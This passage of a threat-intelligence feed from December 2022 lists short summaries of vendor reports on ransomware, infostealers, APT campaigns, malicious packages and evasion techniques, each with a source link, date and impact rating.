Impact:
LOW
Summary:
Researchers from Guardio have identified a new technique that abuses Google’s powerful Ad Words advertising platform to spread rogue promoted search results en masse.
Source: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
2022-12-30
The_European_Government_Organizations_targeted_by_RedDelta_threat_group
MEDIUM
Intel Source:
Recorded Future
Intel Name:
The_European_Government_Organizations_targeted_by_RedDelta_threat_group
Date of Scan:
2022-12-30
Impact:
MEDIUM
Summary:
Researchers from Recorded Future are tracking the activity of RedDelta, which they attribute to a likely Chinese state-sponsored threat activity group that is targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor.
Source: https://www.recordedfuture.com/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant
2022-12-30
Lazarus_Threat_Group_Using_Phishing_Domains_to_Target_NFT_Investors
MEDIUM
Intel Source:
SlowMist
Intel Name:
Lazarus_Threat_Group_Using_Phishing_Domains_to_Target_NFT_Investors
Date of Scan:
2022-12-30
Impact:
MEDIUM
Summary:
Researchers from SlowMist have identified a massive phishing campaign targeting NFT investors. They observed that the attackers set up nearly 500 decoy sites offering malicious mints.
Source: https://slowmist.medium.com/slowmist-our-in-depth-investigation-of-north-korean-apts-large-scale-phishing-attack-on-nft-users-362117600519
2022-12-30
The_WildFire_malware_team_monitoring_malware_techniques
LOW
Intel Source:
PaloAlto
Intel Name:
The_WildFire_malware_team_monitoring_malware_techniques
Date of Scan:
2022-12-30
Impact:
LOW
Summary:
Palo Alto researchers did a deep analysis of how malware authors and malware variants behave when they detect that they are running in a sandbox. They discussed many of the sandboxing approaches available, the pros and cons of each, and many of the evasion types.
Source: https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/
2022-12-28
Vulnerability_in_YITH_WooCommerce_Gift_Cards
LOW
Intel Source:
Wordfence
Intel Name:
Vulnerability_in_YITH_WooCommerce_Gift_Cards
Date of Scan:
2022-12-28
Impact:
LOW
Summary:
The Wordfence Threat Intelligence team has been tracking exploits targeting a Critical Severity Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium, a plugin with over 50,000 installations according to the vendor.
Source: https://www.wordfence.com/blog/2022/12/psa-yith-woocommerce-gift-cards-premium-plugin-exploited-in-the-wild/
2022-12-28
BlueNoroff_bypassing_MoTW
LOW
Intel Source:
Securelist
Intel Name:
BlueNoroff_bypassing_MoTW
Date of Scan:
2022-12-28
Impact:
LOW
Summary:
Researchers from Securelist discovered that a new method the group has adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security measure whereby Windows displays a warning message when the user tries to open a file downloaded from the internet.
Source: https://securelist.com/bluenoroff-methods-bypass-motw/108383/
2022-12-28
Sandbox_Evasions_Navigating_the_Vast_Ocean
LOW
Intel Source:
Palo Alto Networks
Intel Name:
Sandbox_Evasions_Navigating_the_Vast_Ocean
Date of Scan:
2022-12-28
Impact:
LOW
Summary:
Palo Alto Networks customers receive improved detection for the evasions through Advanced WildFire.
Source: https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/#post-126138-_feak18cweg6f
2022-12-28
ArkeiStealer_masquerade_as_a_trading_application
LOW
Intel Source:
Zscaler
Intel Name:
ArkeiStealer_masquerade_as_a_trading_application
Date of Scan:
2022-12-28
Impact:
LOW
Summary:
Researchers from ThreatLabz discovered that threat actors are now distributing ArkeiStealer through Windows Installer binaries which masquerade as a trading application. The trading application is backdoored with the SmokeLoader downloader which further downloads an information stealer.
Source: https://www.zscaler.com/blog/security-research/trade-with-caution
2022-12-28
PureLogs_Stealer_Through_Spam_Campaigns
MEDIUM
Intel Source:
Cyble
Intel Name:
PureLogs_Stealer_Through_Spam_Campaigns
Date of Scan:
2022-12-28
Impact:
MEDIUM
Summary:
Cyble Research and Intelligence Labs (CRIL) came across a tweet by TG Soft about the PureLogs information stealer. This tool is used by the Threat Actor (TA) “Alibaba2044” to launch a malicious spam campaign against targets based in Italy.
Source: https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/
2022-12-27
The_Details_About_Shadow_IT
MEDIUM
Intel Source:
IBM Security Intelligence
Intel Name:
The_Details_About_Shadow_IT
Date of Scan:
2022-12-27
Impact:
MEDIUM
Summary:
IBM Security Intelligence researchers have highlighted three incidents where Shadow IT was leveraged during the attack to help organizations realize how Shadow IT can quickly transform from a threat to an incident.
Source: https://securityintelligence.com/posts/beware-lurking-shadows-it/
2022-12-27
Google_Ads_Traffic_Led_to_Multiple_Malware
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
Google_Ads_Traffic_Led_to_Multiple_Malware
Date of Scan:
2022-12-27
Impact:
MEDIUM
Summary:
Researchers from SANS have identified Google ad traffic that led to a fake TeamViewer page, and that page led to a different type of malware.
Source: https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376/
2022-12-27
The_Details_of_IcedID_BackConnect_Protocol
LOW
Intel Source:
Team Cymru
Intel Name:
The_Details_of_IcedID_BackConnect_Protocol
Date of Scan:
2022-12-27
Impact:
LOW
Summary:
Team-Cymru researchers have continued monitoring the IcedID / BokBot activity and identified some insights derived from infrastructure associated with IcedID’s BackConnect (BC) protocol.
Source: https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol
2022-12-23
Diving_Deep_into_Ekipa_RAT
LOW
Intel Source:
Spider Labs
Intel Name:
Diving_Deep_into_Ekipa_RAT
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
SpiderLabs researchers have analyzed samples of the Ekipa Remote Access Trojan (RAT) in the wild and found interesting techniques for the use of malicious Office documents. The Ekipa RAT was added to sophisticated threat actors’ cyber arsenal and used in the Russia-Ukraine war.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-macros-adapt-to-use-microsoft-publisher-to-push-ekipa-rat/
2022-12-23
New_Variant_of_Kiss_a_Dog_Cryptojacking_Campaign
LOW
Intel Source:
CADO Security
Intel Name:
New_Variant_of_Kiss_a_Dog_Cryptojacking_Campaign
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from CADO Security have uncovered a newer variant of the Kiss-a-Dog campaign and observed it targeting their Redis honeypot, suggesting a broadening of scope beyond Docker and Kubernetes.
Source: https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/
2022-12-23
The_exploitation_of_OWASSRF_in_MS_Exchange_Server_for_RCE
LOW
Intel Source:
Rapid7
Intel Name:
The_exploitation_of_OWASSRF_in_MS_Exchange_Server_for_RCE
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Rapid7 researchers have observed the exploitation of OWASSRF in Microsoft Exchange servers for remote code execution.
Source: https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
2022-12-23
Vice_Society_Ransomware_Attackers_Adopt_Robust_Encryption_Methods
MEDIUM
Intel Source:
SentinelOne
Intel Name:
Vice_Society_Ransomware_Attackers_Adopt_Robust_Encryption_Methods
Date of Scan:
2022-12-23
Impact:
MEDIUM
Summary:
Researchers from SentinelLabs have identified that the Vice Society group is adopting a new custom-branded ransomware payload, dubbed “PolyVice”, in recent intrusions; it implements a robust encryption scheme using the NTRUEncrypt and ChaCha20-Poly1305 algorithms.
Source: https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/
2022-12-23
Ursnif_Banking_Trojan_Active_IOCs
LOW
Intel Source:
Rewterz
Intel Name:
Ursnif_Banking_Trojan_Active_IOCs
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of the Ursnif Banking Trojan. Also known as Gozi and Dreambot, it has been around for more than 10 years. It gained popularity in 2015 when its source code was published on GitHub, and since then its operators have continually tweaked it to suit their goals. It mainly attacks banks and other financial institutions.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-42
2022-12-23
Qakbot_Distributing_via_Virtual_Disk_Files
LOW
Intel Source:
ASEC
Intel Name:
Qakbot_Distributing_via_Virtual_Disk_Files
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from ASEC have identified that Qakbot malware has been distributed in ISO and IMG file formats and discovered that it has recently changed its distribution to the use of VHD files.
Source: https://asec.ahnlab.com/en/44662/
2022-12-23
Nitol_DDoS_Malware_Installing_Amadey_Bot
LOW
Intel Source:
ASEC
Intel Name:
Nitol_DDoS_Malware_Installing_Amadey_Bot
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
ASEC researchers have discovered that a threat actor has been using the Nitol DDoS Bot to install Amadey. Amadey is a downloader that has been in circulation since 2018; besides extracting user credentials, it can also be used to install additional malware.
Source: https://asec.ahnlab.com/en/44504/
2022-12-23
Hackers_Using_Phishing_Emails_to_Target_Tax_Forms
LOW
Intel Source:
Fortinet
Intel Name:
Hackers_Using_Phishing_Emails_to_Target_Tax_Forms
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from Fortinet have discovered malicious emails sent by the recently resurgent Emotet group. Claiming to be from “IRS.gov,” this phishing e-mail originated from an organization’s compromised e-mail account in Pakistan. The subject and body claim that the recipient’s IRS K-1 forms are attached in a Zip archive encrypted with the password “0440”.
Source: https://www.fortinet.com/blog/threat-research/the-taxman-never-sleeps
2022-12-23
IcedID_Botnet_Leveraging_Google_PPC_to_Distribute_Malware
LOW
Intel Source:
TrendMicro
Intel Name:
IcedID_Botnet_Leveraging_Google_PPC_to_Distribute_Malware
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from TrendMicro have analyzed the latest changes in IcedID botnet from a campaign that abuses Google pay-per-click (PPC) ads to distribute IcedID via malvertising attacks.
Source: https://www.trendmicro.com/en_us/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html
2022-12-23
The_Examine_of_Albanian_Government_E_service_Attack
LOW
Intel Source:
Securelist
Intel Name:
The_Examine_of_Albanian_Government_E_service_Attack
Date of Scan:
2022-12-23
Impact:
LOW
Summary:
Researchers from Securelist have compared the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
Source: https://securelist.com/ransomware-and-wiper-signed-with-stolen-certificates/108350/
2022-12-22
Shuckworm_APT_Group_aka_Armageddon_Active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
Shuckworm_APT_Group_aka_Armageddon_Active_IOCs
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of Shuckworm APT Group. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The main goal of this APT is to use the malicious document to gain control of the target machine.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-shuckworm-apt-group-aka-armageddon-active-iocs
2022-12-22
New_Supply_Chain_Attack_Using_Python_Package_Index
MEDIUM
Intel Source:
Fortinet
Intel Name:
New_Supply_Chain_Attack_Using_Python_Package_Index
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
Researchers from Fortinet have discovered a 0-day attack embedded in a PyPI (Python Package Index) package called “aioconsol.”
Source: https://www.fortinet.com/blog/threat-research/new-supply-chain-attack-uses-python-package-index-aioconsol
2022-12-22
AsyncRAT_Active_IOCs
LOW
Intel Source:
Rewterz
Intel Name:
AsyncRAT_Active_IOCs
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of AsyncRAT. It is an open-source tool designed for remote monitoring via encrypted connections. However, it could be utilized by threat actors as it provides keylogging, remote access, and other functionality that could damage a victim’s computer or system.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-asyncrat-active-iocs-4
2022-12-22
APT_SideWinder_Group_Active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
APT_SideWinder_Group_Active_IOCs
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
The Rewterz analyst team has identified the active IOCs of the APT SideWinder Group, a suspected Indian threat actor group that has been active since 2012. In its most recent effort it has been detected targeting Pakistani government officials with a decoy file related to COVID-19.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-sidewinder-group-targeting-pakistan-active-iocs-2
2022-12-22
Wanna_Cryptor_aka_WannaCry_Ransomware_Active_IOCs
HIGH
Intel Source:
Rewterz
Intel Name:
Wanna_Cryptor_aka_WannaCry_Ransomware_Active_IOCs
Date of Scan:
2022-12-22
Impact:
HIGH
Summary:
The Rewterz analyst team produced an analysis summary of Wanna Cryptor aka WannaCry Ransomware and has identified its active IOCs. WannaCry, also called WCry or WanaCrypt0r, is ransomware that was discovered in May 2017, when it infected networks running Microsoft Windows as part of a massive cyberattack. This ransomware encrypts all of the victim's data files and demands payment, usually in bitcoin, to restore them. WannaCry is one of the most dangerous malware ever used in cyberattacks.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-wanna-cryptor-aka-wannacry-ransomware-active-iocs-2
2022-12-22
New_Zerobot_1_1_adds_new_exploits
HIGH
Intel Source:
Microsoft
Intel Name:
New_Zerobot_1_1_adds_new_exploits
Date of Scan:
2022-12-22
Impact:
HIGH
Summary:
The new version of the malware, Zerobot 1.1, adds new exploits and distributed denial-of-service attack capabilities, expanding the malware’s reach to different types of Internet of Things (IoT) devices, according to a report released by Microsoft on Wednesday. Zerobot was first discovered by researchers in November. The malware spreads primarily through unpatched and improperly secured IoT devices, such as firewalls, routers, and cameras, according to Microsoft. Hackers constantly modify the botnet to scale and target as many of the devices as possible.
Source: https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/
2022-12-22
Meddler_in_the_Middle_Phishing_Attacks
LOW
Intel Source:
PaloAlto
Intel Name:
Meddler_in_the_Middle_Phishing_Attacks
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Palo Alto Unit 42 researchers explained the phishing techniques used in Meddler in the Middle (MitM) phishing attacks. MitM phishing attacks show how threat actors find ways to get around traditional defenses and advice. They are a state-of-the-art type of phishing attack capable of breaking two-factor authentication (2FA) while avoiding many content-based phishing detection engines. Rather than showing a spoofed version of a target login page, a MitM attack uses a reverse-proxy server to relay the original login page directly to the user’s browser.
Source: https://unit42.paloaltonetworks.com/meddler-phishing-attacks/
2022-12-22
Windows_AMSI_Bypass_Techniques
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Windows_AMSI_Bypass_Techniques
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
TrendMicro researchers have analyzed the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI).
Source: https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html
2022-12-22
FakejQuery_Domain_Redirects_Site_Visitors_to_Scam_Pages
LOW
Intel Source:
Sucuri
Intel Name:
FakejQuery_Domain_Redirects_Site_Visitors_to_Scam_Pages
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Sucuri researchers have identified an infection that is making its rounds across vulnerable WordPress sites, detected on over 160 websites. The infection is injected at the top of legitimate JavaScript files and executes a script from the malicious domain.
Source: https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html
2022-12-22
Hive_Ransomware_Active_IOCs
LOW
Intel Source:
Rewterz
Intel Name:
Hive_Ransomware_Active_IOCs
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Hive Ransomware. It is one of the fastest evolving ransomware families, first observed in June 2021. It likely operates as affiliate-based ransomware and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-hive-ransomware-active-iocs-28
2022-12-22
North_Korean_APT_Kimsuky_Aka_Black_Banshee_Active_IOCs
LOW
Intel Source:
Rewterz
Intel Name:
North_Korean_APT_Kimsuky_Aka_Black_Banshee_Active_IOCs
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of North Korean APT Kimsuky Aka Black Banshee. It is a North Korean nation-state actor that has been active since 2012. It primarily targets South Korean government agencies and conducts espionage activities against targets in the United States and Japan.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-2
2022-12-22
Spotted_multiple_ransomware_strains
MEDIUM
Intel Source:
Cyble
Intel Name:
Spotted_multiple_ransomware_strains
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
Cyble Research and Intelligence Labs (CRIL) have spotted multiple ransomware strains created based on the source of other ransomware families. Recently, CRIL observed new ransomware families, such as Putin Team, ScareCrow, BlueSky Meow, etc., created from the leaked source code of Conti Ransomware.
Source: https://blog.cyble.com/2022/12/22/new-ransomware-strains-emerging-from-leaked-contis-source-code/
2022-12-22
Hackers_Using_Microsoft_Excel_Malicious_Addins
LOW
Intel Source:
Cisco Talos
Intel Name:
Hackers_Using_Microsoft_Excel_Malicious_Addins
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from Cisco Talos have investigated another vector for the introduction of malicious code into Microsoft Excel: malicious add-ins, specifically XLL files.
Source: https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/
2022-12-22
Diving_Deep_into_Nokoyawa_Ransomware
LOW
Intel Source:
Zscaler
Intel Name:
Diving_Deep_into_Nokoyawa_Ransomware
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from Zscaler have analyzed the Nokoyawa ransomware 2.0 including its new configuration, encryption algorithms, and data leak site.
Source: https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust
2022-12-22
The_Examine_of_Royal_Ransomware_and_Tools_Using_by_Threat_Actors
LOW
Intel Source:
TrendMicro
Intel Name:
The_Examine_of_Royal_Ransomware_and_Tools_Using_by_Threat_Actors
Date of Scan:
2022-12-22
Impact:
LOW
Summary:
Researchers from TrendMicro have detected multiple attacks from the Royal ransomware group and have investigated the tools that Royal ransomware actors used to carry out their attacks.
Source: https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html
2022-12-22
Qakbot_aka_Qbot_Malware_Active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
Qakbot_aka_Qbot_Malware_Active_IOCs
Date of Scan:
2022-12-22
Impact:
MEDIUM
Summary:
Over the last couple of months the Rewterz analyst team has observed attackers employing a number of strategies to avoid detection, using Excel 4.0 (XLM) macros and ZIP file extensions. Threat actors are disguising attachments intended to spread malware using a variety of common file names with typical keywords for finance and business operations.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-51
2022-12-21
Russian_Hackers_Targeting_Petroleum_Refinery_in_NATO
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Russian_Hackers_Targeting_Petroleum_Refinery_in_NATO
Date of Scan:
2022-12-21
Impact:
MEDIUM
Summary:
PaloAlto researchers have discovered the Russia-linked Gamaredon group unsuccessfully attempting to break into a large petroleum refining company within a NATO member state earlier this year amid the ongoing Russo-Ukrainian war. They have also seen more than 500 new domains and 200 malware samples attributed to the Gamaredon APT since the beginning of the invasion.
Source: https://unit42.paloaltonetworks.com/trident-ursa/
2022-12-20
SystemBC_Malware_active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
SystemBC_Malware_active_IOCs
Date of Scan:
2022-12-20
Impact:
MEDIUM
Summary:
The Rewterz analyst team produced an analysis summary of the SystemBC malware, which is currently being distributed through Emotet and SmokeLoader. The malware has been used in multiple ransomware attacks over the past few years. SystemBC acts as a proxy bot: if an infected system has SystemBC on it, the system can be used as a passage to access the victim’s address.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-systembc-malware-active-iocs-8
2022-12-20
STOP_DJVU_Ransomware_active_IOCs
HIGH
Intel Source:
Rewterz
Intel Name:
STOP_DJVU_Ransomware_active_IOCs
Date of Scan:
2022-12-20
Impact:
HIGH
Summary:
The Rewterz analyst team produced an analysis summary of STOP (DJVU) Ransomware. STOP/DJVU is a Trojan that encrypts files. It infiltrates the computer invisibly and encrypts all of the victim's data, making it unavailable. It leaves a ransom note demanding money in exchange for decrypting the data and making it available again. The malware is delivered via cracked applications, fake set-up apps, keygens, activators, and Windows updates.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-stop-djvu-ransomware-active-iocs-50
2022-12-20
BumbleBee_Malware_active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
BumbleBee_Malware_active_IOCs
Date of Scan:
2022-12-20
Impact:
MEDIUM
Summary:
The Rewterz analyst team produced an analysis summary of the BumbleBee malware. This malware loader is used to download Cobalt Strike and other malware such as ransomware. It replaces the BazarLoader backdoor, which was previously used to deliver ransomware payloads. This new malware is linked to a number of threat actors, including several well-known ransomware groups.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bumblebee-malware-active-iocs-14
2022-12-20
LockBit_3_0_Ransomware_active_IOCs
HIGH
Intel Source:
Rewterz
Intel Name:
LockBit_3_0_Ransomware_active_IOCs
Date of Scan:
2022-12-20
Impact:
HIGH
Summary:
The Rewterz analyst team produced an analysis summary of LockBit 3.0 ransomware, which has recently been distributed without restriction to a particular version or identical filename. Users must examine the file extensions of document files, update their apps and V3 to the newest version, and be very cautious when opening files from unidentified sources.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-active-iocs-4
2022-12-20
GuLoader_Dissection_Malware_Analysis
LOW
Intel Source:
CrowdStrike
Intel Name:
GuLoader_Dissection_Malware_Analysis
Date of Scan:
2022-12-20
Impact:
LOW
Summary:
CrowdStrike researchers expose the complete GuLoader behavior by mapping all embedded DJB2 hash values for every API used by the malware.
Source: https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/
2022-12-20
GandCrab_Ransomware_active_IOCs
HIGH
Intel Source:
Rewterz
Intel Name:
GandCrab_Ransomware_active_IOCs
Date of Scan:
2022-12-20
Impact:
HIGH
Summary:
The Rewterz analyst team produced an analysis summary of GandCrab, a ransomware-as-a-service variant that was discovered in early 2018. As of today, five versions of GandCrab have been created since its discovery. GandCrab ransomware encrypts the victim’s files and demands ransom money in exchange for decryption keys. GandCrab targets organisations and individuals that use Microsoft Windows-powered PCs. This ransomware has attacked a huge number of systems in India, Chile, Peru, the United States, and the Philippines.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gandcrab-ransomware-active-iocs-12
2022-12-20
RisePro_Stealer_Malware_Presence_on_Russian_Market
LOW
Intel Source:
FlashPoint
Intel Name:
RisePro_Stealer_Malware_Presence_on_Russian_Market
Date of Scan:
2022-12-20
Impact:
LOW
Summary:
Researchers from Flashpoint have observed RisePro stealer malware logs on Russian Market; the appearance of the stealer as a payload for a pay-per-install service may indicate its growing popularity and viability within the threat actor community.
Source: https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
2022-12-20
Posing_of_SentinelOne_SDK_as_Malicious_PyPI_package
LOW
Intel Source:
Reversing Labs
Intel Name:
Posing_of_SentinelOne_SDK_as_Malicious_PyPI_package
Date of Scan:
2022-12-20
Impact:
LOW
Summary:
Researchers from Reversing Labs have identified a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.
Source: https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
2022-12-20
Telecom_and_Governments_are_targeted_by_Raspberry_Robin_Malware
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Telecom_and_Governments_are_targeted_by_Raspberry_Robin_Malware
Date of Scan:
2022-12-20
Impact:
MEDIUM
Summary:
TrendMicro researchers discovered new samples of the Raspberry Robin malware spreading in telecommunications and government office systems. The main payload itself is packed with more than 10 layers of obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.
Source: https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html
2022-12-20
Snake_Keylogger_s_Malware_active_IOCs
MEDIUM
Intel Source:
Rewterz
Intel Name:
Snake_Keylogger_s_Malware_active_IOCs
Date of Scan:
2022-12-20
Impact:
MEDIUM
Summary:
The Rewterz analyst team produced an analysis summary of the Snake Keylogger malware. Snake’s main feature is keylogging, but it also has additional capabilities such as taking screenshots and extracting data from the clipboard. Snake can also extract and exfiltrate data from browsers and email clients.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-snake-keyloggers-malware-active-iocs-39
2022-12-19
Infostealer_Malware_with_Double_Extension
LOW
Intel Source:
ISC.SANS
Intel Name:
Infostealer_Malware_with_Double_Extension
Date of Scan:
2022-12-19
Impact:
LOW
Summary:
Researchers from SANS have analyzed a file attachment pretending to be from HSBC Global Payments and Cash Management. The attachment, named payment_copy.pdf.z, is a RAR archive that extracts to a file with a double extension ending in .pdf.exe. The file is a trojan infostealer and is detected by multiple scanning engines.
Source: https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354/
2022-12-19
Hackers_Leveraging_DELTA_System_Users_Using_FateGrab_or_StealDeal_Malware
LOW
Intel Source:
CERT-UA
Intel Name:
Hackers_Leveraging_DELTA_System_Users_Using_FateGrab_or_StealDeal_Malware
Date of Scan:
2022-12-19
Impact:
LOW
Summary:
CERT-UA researchers have identified the distribution of e-mails sent from a compromised e-mail address belonging to an employee of the Ministry of Defense. The attachments, in the form of PDF documents, imitate legitimate digests of the ISTAR unit of the Zaporizhzhia Police Department but contain a link to a malicious ZIP archive.
Source: https://cert.gov.ua/article/3349703
2022-12-19
Malicious_Glupteba_Activity
MEDIUM
Intel Source:
Nozomi Networks
Intel Name:
Malicious_Glupteba_Activity
Date of Scan:
2022-12-19
Impact:
MEDIUM
Summary:
Nozomi Networks Labs shared their latest discoveries on the Glupteba trojan, an example of a threat actor leveraging blockchain-based technologies to carry out malicious activity.
Source: https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/
2022-12-16
Agenda_Ransomware_Using_Rust_language
LOW
Intel Source:
TrendMicro
Intel Name:
Agenda_Ransomware_Using_Rust_language
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Researchers from Trend Micro have analyzed a sample of the Agenda ransomware written in the Rust language and detected it as Ransom.Win32.AGENDA.THIAFBB. It has recently been targeting critical sectors such as the healthcare and education industries.
Source: https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html
2022-12-16
New_Malicious_Python_Package_Shaderz_Distributing_via_Supply_Chain_Attack
LOW
Intel Source:
Fortinet
Intel Name:
New_Malicious_Python_Package_Shaderz_Distributing_via_Supply_Chain_Attack
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Researchers from Fortinet have analyzed the malicious Python package Shaderz and closely monitored the executables it downloads.
Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-package-shaderz-part-2
2022-12-16
Russian_Threat_Groups_Launching_Multiple_Campaigns
LOW
Intel Source:
Cyfirma
Intel Name:
Russian_Threat_Groups_Launching_Multiple_Campaigns
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Cyfirma researchers have observed three campaigns, named Evian, UNC064, and Siberian Bear, that are potentially operated by Russian-speaking threat groups on behalf of their Russian masters.
Source: https://www.cyfirma.com/outofband/multiple-campaigns-by-russian-speaking-threat-groups-expanding-their-attack-footprint/
2022-12-16
CSC_Bank_Mitra_fraudulent_operation
LOW
Intel Source:
Cyble
Intel Name:
CSC_Bank_Mitra_fraudulent_operation
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Cyble Research & Intelligence Labs studied a fraud scheme operation done by impostors posing as Village Level Entrepreneurs (VLEs) to dupe and scam Indian rural subscribers registering for Customer Service Point (Bank Mitra), an initiative under the Common Services Center (CSC) Scheme of the Ministry of Electronics and Information Technology (MEITY), India.
Source: https://blog.cyble.com/2022/12/16/con-games-fraudsters-posing-as-vles-duping-csc-bank-mitra-scheme-subscribers/
2022-12-16
Ukrainian_Government_Networks_Breached_via_Trojanized_Windows_10_Installers
LOW
Intel Source:
Mandiant
Intel Name:
Ukrainian_Government_Networks_Breached_via_Trojanized_Windows_10_Installers
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Researchers from Mandiant have observed that Ukrainian government entities have been hacked in targeted attacks after their networks were first compromised via trojanized ISO files posing as legitimate Windows 10 installers.
Source: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
2022-12-16
DarkTortilla_Malware_Spreading_Via_Phishing_Sites
LOW
Intel Source:
Cyble
Intel Name:
DarkTortilla_Malware_Spreading_Via_Phishing_Sites
Date of Scan:
2022-12-16
Impact:
LOW
Summary:
Cyble researchers have identified a malicious campaign in which attackers drop the DarkTortilla malware. DarkTortilla is a complex .NET-based malware that has been active since 2015 and is known to drop multiple stealers and Remote Access Trojans (RATs) such as AgentTesla, AsyncRAT, and NanoCore.
Source: https://blog.cyble.com/2022/12/16/sophisticated-darktortilla-malware-spreading-via-phishing-sites/
2022-12-16
MCCrash_Botnet_Targeting_Private_Minecraft_Servers
MEDIUM
Intel Source:
Microsoft
Intel Name:
MCCrash_Botnet_Targeting_Private_Minecraft_Servers
Date of Scan:
2022-12-16
Impact:
MEDIUM
Summary:
Microsoft researchers have identified a cross-platform botnet named MCCrash that's primarily designed to launch distributed denial-of-service (DDoS) attacks against private Minecraft servers. It is characterized by a unique spreading mechanism that allows it to propagate to Linux-based devices despite originating from malicious software downloads on Windows hosts.
Source: https://www.microsoft.com/en-us/security/blog/2022/12/15/mccrash-cross-platform-ddos-botnet-targets-private-minecraft-servers/
2022-12-15
Magniber_Ransomware_distribution_again
LOW
